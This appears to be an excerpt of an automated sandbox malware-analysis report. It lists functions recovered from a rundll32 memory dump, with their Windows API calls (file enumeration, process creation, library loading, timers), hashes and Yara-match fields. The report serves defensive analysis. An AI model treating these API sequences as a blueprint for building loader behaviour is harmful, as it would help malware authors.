                                                          • Instruction Fuzzy Hash: C8A18D71D1120AEFDB519FA5EC88EAEBBBAFF88344B004029EA05A3250D7315E45DF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06281195 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 062811AA
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                            • Part of subcall function 0628BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
                                                            • Part of subcall function 0628BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
                                                            • Part of subcall function 0628BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
                                                            • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
                                                            • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
                                                            • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BCB9
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
                                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 06281206
                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 06281219
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 06281230
                                                            • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BD65
                                                            • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BD77
                                                            • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BD92
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0628125B
                                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 06281273
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 062812CD
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 062812F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06281302
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 06281376
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281386
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 062813AF
                                                          • lstrlenW.KERNEL32(0629B878,?), ref: 06281429
                                                          • DeleteFileW.KERNEL32(?,?), ref: 06281457
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281465
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281486
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                          • String ID:
                                                          • API String ID: 72361108-0
                                                          • Opcode ID: 3ab27ae84ffc38446a968bfa05429ca61fa8f00d088b10630386aac60dcc4da6
                                                          • Instruction ID: 9a62236faee44bc2b42d99d9db3124c86627329e4e7fe250655a159a4510e11c
                                                          • Opcode Fuzzy Hash: 3ab27ae84ffc38446a968bfa05429ca61fa8f00d088b10630386aac60dcc4da6
                                                          • Instruction Fuzzy Hash: 7B9147B191131ABFCB50EFA4EC8CCAB7BADFB89245B044415FA09DB191E2349955CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06275437 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06275465
                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 062754AB
                                                          • StrChrA.SHLWAPI(?,0000000A), ref: 062754B8
                                                          • StrChrA.SHLWAPI(?,0000007C), ref: 062754DF
                                                          • StrTrimA.SHLWAPI(?,06295FCC), ref: 062754F4
                                                          • StrChrA.SHLWAPI(?,0000003D), ref: 062754FD
                                                          • StrTrimA.SHLWAPI(00000001,06295FCC), ref: 06275513
                                                          • _strupr.NTDLL ref: 0627551A
                                                          • StrTrimA.SHLWAPI(?,?), ref: 06275527
                                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0627556F
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0627558E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                          • String ID: $;
                                                          • API String ID: 4019332941-73438061
                                                          • Opcode ID: acbee3d10940411575fd8d617f9562b1d8f3087e5d831fed8ce406d88cc2981c
                                                          • Instruction ID: c6e647ef7b4b252e737a50270cf3ad5da0fca9dcfb0daa99117fcaa9c46522eb
                                                          • Opcode Fuzzy Hash: acbee3d10940411575fd8d617f9562b1d8f3087e5d831fed8ce406d88cc2981c
                                                          • Instruction Fuzzy Hash: 7C41A071A143069FD791AF28DC48F1BBBE9AF89200F044819FD99AB241DF74D905CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06282DBB Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 06282DF8
                                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 06282E0C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 06282F37
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06282E38
                                                          • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06282E70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                                                          • String ID: 0x%08X$W
                                                          • API String ID: 95801598-2600449260
                                                          • Opcode ID: e9a97bd7f1562c4f498e69a1e88705aa2bdee1473a5c1136616d9b19de38f966
                                                          • Instruction ID: dc1743d3f40e07ba714e6458de19015d65dcb9653ba30c0d61a6d0fd6c88a81a
                                                          • Opcode Fuzzy Hash: e9a97bd7f1562c4f498e69a1e88705aa2bdee1473a5c1136616d9b19de38f966
                                                          • Instruction Fuzzy Hash: FE517DB1911305EFDB51AF64DC49BAA7BE8FF18314F108119EE59E6280D7B4E644CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628C01F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628C034
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
                                                          • wcstombs.NTDLL ref: 0628C077
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
                                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
                                                          • GetLastError.KERNEL32 ref: 0628C102
                                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0628C122
                                                          • CloseHandle.KERNEL32(?), ref: 0628C131
                                                          • CloseHandle.KERNEL32(?), ref: 0628C136
                                                          • GetLastError.KERNEL32 ref: 0628C13A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                          • String ID: D
                                                          • API String ID: 2463014471-2746444292
                                                          • Opcode ID: 2ee05005f9c4e4befe897a620b8535cc3e03ec4ad49cdd6feb8cdecece855286
                                                          • Instruction ID: d8f8d9ad36e19b96790efaf943f10819f16cba8bde03beeb7934d797231d95b4
                                                          • Opcode Fuzzy Hash: 2ee05005f9c4e4befe897a620b8535cc3e03ec4ad49cdd6feb8cdecece855286
                                                          • Instruction Fuzzy Hash: 00413BB1E11219FFEB51EFA4DD899EEBBB9EB48244F204069EA01B6140D7715E04CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062744A6 Relevance: 21.4, APIs: 14, Instructions: 391memorythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 06274526
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 06274545
                                                          • GetLastError.KERNEL32 ref: 062746F6
                                                          • GetLastError.KERNEL32 ref: 06274778
                                                          • SwitchToThread.KERNEL32(?,?,?,?), ref: 062747C1
                                                          • GetLastError.KERNEL32 ref: 06274813
                                                          • GetLastError.KERNEL32 ref: 06274822
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 06274832
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 06274843
                                                          • RtlExitUserThread.NTDLL(?), ref: 06274851
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062748C0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06274911
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 06274946
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 06274956
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                                                          • String ID:
                                                          • API String ID: 2794784202-0
                                                          • Opcode ID: 2c604e95071f76cd819883e8a39b973a4a77ec334ab557807f6b80bbc752fba5
                                                          • Instruction ID: 7450064cc9ed76efbbad6c2fe7797a75136d54ad69c2b99cb46ac04ca5d14e0d
                                                          • Opcode Fuzzy Hash: 2c604e95071f76cd819883e8a39b973a4a77ec334ab557807f6b80bbc752fba5
                                                          • Instruction Fuzzy Hash: 40E17DB191034AEFEB60AF65DC88EAA7BFAFF48344F104529FA19D2150D7709954CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627BFF0 Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C03F
                                                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0627C058
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C063
                                                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0627C07C
                                                          • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0627C11F
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0627C141
                                                          • lstrcpy.KERNEL32(00000020,?), ref: 0627C160
                                                          • lstrlen.KERNEL32(?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0627C16A
                                                          • memcpy.NTDLL(?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C1AB
                                                          • memcpy.NTDLL(?,?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0627C1BE
                                                          • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057), ref: 0627C1E2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,062885F1,?,00000000,0000001E), ref: 0627C201
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0627C227
                                                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0627C243
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3323474148-0
                                                          • Opcode ID: 8fcaa9368f857eba5c4a2154b9068b4eba4e1cf3b11c5fdadfbddd2575981474
                                                          • Instruction ID: d0f011e4938dfbfeab17b8fa82a149fba9c94f7a12133b19302f43a554933f52
                                                          • Opcode Fuzzy Hash: 8fcaa9368f857eba5c4a2154b9068b4eba4e1cf3b11c5fdadfbddd2575981474
                                                          • Instruction Fuzzy Hash: A5716772614302AFD761DF28D844F5ABBE9BF88314F04492DFA99E3250D771E548CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062805BC Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 062805D3
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 062805DA
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062805F1
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06280602
                                                          • lstrcat.KERNEL32(?,?), ref: 0628061E
                                                          • lstrcat.KERNEL32(?,?), ref: 0628062F
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06280640
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062806DD
                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 06280716
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0628072F
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 06280739
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 06280749
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 06280762
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 06280772
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                          • String ID:
                                                          • API String ID: 333890978-0
                                                          • Opcode ID: a8d49092d34611821129c90a8a6f16831fb1715360cb6bed487cb06775e4e625
                                                          • Instruction ID: 9b550c94ae299ccb4e70ef18c05f3b3ca317540767fe2c0035a23d4cc718efe4
                                                          • Opcode Fuzzy Hash: a8d49092d34611821129c90a8a6f16831fb1715360cb6bed487cb06775e4e625
                                                          • Instruction Fuzzy Hash: 5951A376900209BFDB12AFA4EC88DAE7BBEFF88354B058425FB05E7150D6319949DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628AFC2 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,0627663D,?,?), ref: 0628AFCF
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0627663D,?,?), ref: 0628AFF8
                                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0628B018
                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 0628B034
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B040
                                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0627663D,?,?), ref: 0628B043
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B04F
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B06C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B086
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B09C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0B2
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0C8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0DE
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,0627663D,?,?), ref: 0628B107
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                          • String ID:
                                                          • API String ID: 3772355505-0
                                                          • Opcode ID: 670999cdaf205d9a4b224f1a334abcb19f1764dba60bb40876b88522fb5dd67f
                                                          • Instruction ID: e142bd6690b63f9ac22cde861e54580233662ba4f0f03a2cdcc5364a953c97cf
                                                          • Opcode Fuzzy Hash: 670999cdaf205d9a4b224f1a334abcb19f1764dba60bb40876b88522fb5dd67f
                                                          • Instruction Fuzzy Hash: AC3129B1A1530BAFD711EF64EC889667BADEF49345B00442AE904DB291EB74D815CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D016 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D02D
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D038
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D040
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627D055
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627D066
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0627D078
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D07D
                                                          • lstrcatW.KERNEL32(00000000,062953E0), ref: 0627D089
                                                          • lstrcatW.KERNEL32(00000000), ref: 0627D092
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D097
                                                          • lstrcatW.KERNEL32(00000000,062953E0), ref: 0627D0A3
                                                          • lstrcatW.KERNEL32(00000000,00000002), ref: 0627D0BF
                                                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D0C7
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D0D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                          • String ID:
                                                          • API String ID: 3635185113-0
                                                          • Opcode ID: 80dc876031501b66d9b54c007dbf86f9eaf6a214a08b4b4dfa43e2799f62dc11
                                                          • Instruction ID: 76979abc77bcf3884f80a6783d678abeda61098905f721226b9a68c6ec0f3c7f
                                                          • Opcode Fuzzy Hash: 80dc876031501b66d9b54c007dbf86f9eaf6a214a08b4b4dfa43e2799f62dc11
                                                          • Instruction Fuzzy Hash: 9121C232210305BFD7226F24AC89F7FBBA9EFC9B55F00041DFA05A2110DB6198068AB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E19A Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06277A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 06277AA6
                                                            • Part of subcall function 06277A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 06277ABE
                                                            • Part of subcall function 06277A61: WaitForSingleObject.KERNEL32(00000000,?,062887CC,?,?), ref: 06277B86
                                                            • Part of subcall function 06277A61: HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BAF
                                                            • Part of subcall function 06277A61: HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BBF
                                                            • Part of subcall function 06277A61: RegCloseKey.ADVAPI32(?,?,062887CC,?,?), ref: 06277BC8
                                                          • lstrcmp.KERNEL32(?,00000000), ref: 0628E211
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0627399C,00000000,00000000), ref: 0628E23D
                                                          • GetCurrentThreadId.KERNEL32 ref: 0628E2EE
                                                          • GetCurrentThread.KERNEL32 ref: 0628E2FF
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0627399C,00000001,76CDF730,00000000,00000000), ref: 0628E33C
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0627399C,00000001,76CDF730,00000000,00000000), ref: 0628E350
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0628E35E
                                                          • wsprintfA.USER32 ref: 0628E376
                                                            • Part of subcall function 06273263: lstrlen.KERNEL32(?,00000000,06293716,00000000,06282466,?,?,?,06288A07,?,?,?,00000000,00000001,00000000,?), ref: 0627326D
                                                            • Part of subcall function 06273263: lstrcpy.KERNEL32(00000000,?), ref: 06273291
                                                            • Part of subcall function 06273263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,06288A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06273298
                                                            • Part of subcall function 06273263: lstrcat.KERNEL32(00000000,?), ref: 062732EF
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 0628E381
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0628E398
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628E3A9
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628E3B5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                          • String ID:
                                                          • API String ID: 773763258-0
                                                          • Opcode ID: ec89563c7d0d06de7eeb955a14ed0ba95f5e5e4029be05a5651c084e08fda48c
                                                          • Instruction ID: 20a5ddb18638e5442277bd188f8bc1a2b0014d27938dd32d9b82ffc8732319f7
                                                          • Opcode Fuzzy Hash: ec89563c7d0d06de7eeb955a14ed0ba95f5e5e4029be05a5651c084e08fda48c
                                                          • Instruction Fuzzy Hash: 3471247191121AEFDB51EFA5EC88EEEBBB9FF48310F054015EA04A7260D730A945DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062751FF Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06275226
                                                          • memcpy.NTDLL(?,?,00000010), ref: 06275249
                                                          • memset.NTDLL ref: 06275295
                                                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 062752A9
                                                          • GetLastError.KERNEL32 ref: 062752D7
                                                          • GetLastError.KERNEL32 ref: 0627531E
                                                          • GetLastError.KERNEL32 ref: 0627533D
                                                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 06275377
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06275385
                                                          • GetLastError.KERNEL32 ref: 06275408
                                                          • ReleaseMutex.KERNEL32(?), ref: 0627541A
                                                          • RtlExitUserThread.NTDLL(?), ref: 06275430
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                          • String ID:
                                                          • API String ID: 4037736292-0
                                                          • Opcode ID: fd923aca25d3b7f634b104e82dfcefcff5663e94c59757ab62aeba4352a187e1
                                                          • Instruction ID: 3aa286eeda3e07d4b7dd153d7782a6c6976a7fd21aadde0eefa8a78bc83e8adf
                                                          • Opcode Fuzzy Hash: fd923aca25d3b7f634b104e82dfcefcff5663e94c59757ab62aeba4352a187e1
                                                          • Instruction Fuzzy Hash: CF617D71924701AFD7519F25D848E5BB7E9BFC8720F00891EFA96A2190EBB4E405CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627D9F6 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0627DA0C
                                                          • lstrlen.KERNEL32(?), ref: 0627DA14
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DA24
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627DA43
                                                          • lstrlen.KERNEL32(?), ref: 0627DA58
                                                          • lstrlen.KERNEL32(?), ref: 0627DA66
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0627DAB4
                                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0627DAD8
                                                          • lstrlen.KERNEL32(?), ref: 0627DB0B
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627DB36
